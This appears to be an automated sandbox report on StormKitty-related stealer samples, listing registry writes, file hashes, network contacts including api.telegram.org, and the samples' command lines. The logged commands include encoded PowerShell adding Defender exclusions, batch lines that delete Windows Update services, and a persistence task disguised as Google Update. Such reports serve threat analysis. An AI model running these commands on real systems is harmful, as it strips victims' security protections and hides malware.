| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\testy.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\rustcheat.exe
"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"
C:\Users\Admin\AppData\Local\Temp\testy.exe
"C:\Users\Admin\AppData\Local\Temp\testy.exe"
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe\""
C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe
taskeng.exe {34F6453D-8D3B-45D6-AC0B-C71CD6791D8A} S-1-5-21-377084978-2088738870-2818360375-1000:DSWJWADP\Admin:Interactive:[1]
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCE85.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
C:\Windows\system32\taskkill.exe
TaskKill /F /IM 2632
C:\Windows\system32\timeout.exe
Timeout /T 2 /Nobreak
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe "ofrnufvwokgx"
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAZgByAGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcAB2AGcAIwA+AA=="
C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe
"C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop UsoSvc
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\system32\sc.exe
sc stop wuauserv
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
sc stop bits
C:\Windows\system32\sc.exe
sc stop dosvc
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\testy.exe
| MD5 | 50bfdd2eb713e8b5ef0899848159542e |
| SHA1 | df80dcd51ec4af47f286f778e8d7f19dedc4d3b8 |
| SHA256 | 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61 |
| SHA512 | d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
| MD5 | 7b8fcb29905e045b7f8c1dc9bc305698 |
| SHA1 | 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8 |
| SHA256 | 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173 |
| SHA512 | d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2 |
memory/2632-68-0x000000013F740000-0x000000013F790000-memory.dmp
memory/2232-69-0x000000013F270000-0x000000013F68E000-memory.dmp
memory/2232-70-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2632-71-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2632-72-0x0000000002160000-0x00000000021D4000-memory.dmp
memory/2232-73-0x000000001B380000-0x000000001B400000-memory.dmp
memory/2632-74-0x00000000021D0000-0x00000000021D6000-memory.dmp
memory/1920-79-0x000000001B210000-0x000000001B4F2000-memory.dmp
memory/1920-80-0x00000000027B0000-0x00000000027B8000-memory.dmp
memory/1920-81-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp
memory/1920-82-0x00000000027C0000-0x0000000002840000-memory.dmp
memory/1920-83-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp
memory/1920-84-0x000007FEEF000000-0x000007FEEF99D000-memory.dmp
memory/2232-85-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2632-86-0x000007FEF54F0000-0x000007FEF5EDC000-memory.dmp
memory/2232-87-0x000000001B380000-0x000000001B400000-memory.dmp
memory/2632-88-0x000000001B9A0000-0x000000001BA20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll
| MD5 | 6d1c62ec1c2ef722f49b2d8dd4a4df16 |
| SHA1 | 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6 |
| SHA256 | 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c |
| SHA512 | c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2 |
C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll
| MD5 | 7a2d5deab61f043394a510f4e2c0866f |
| SHA1 | ca16110c9cf6522cd7bea32895fd0f697442849b |
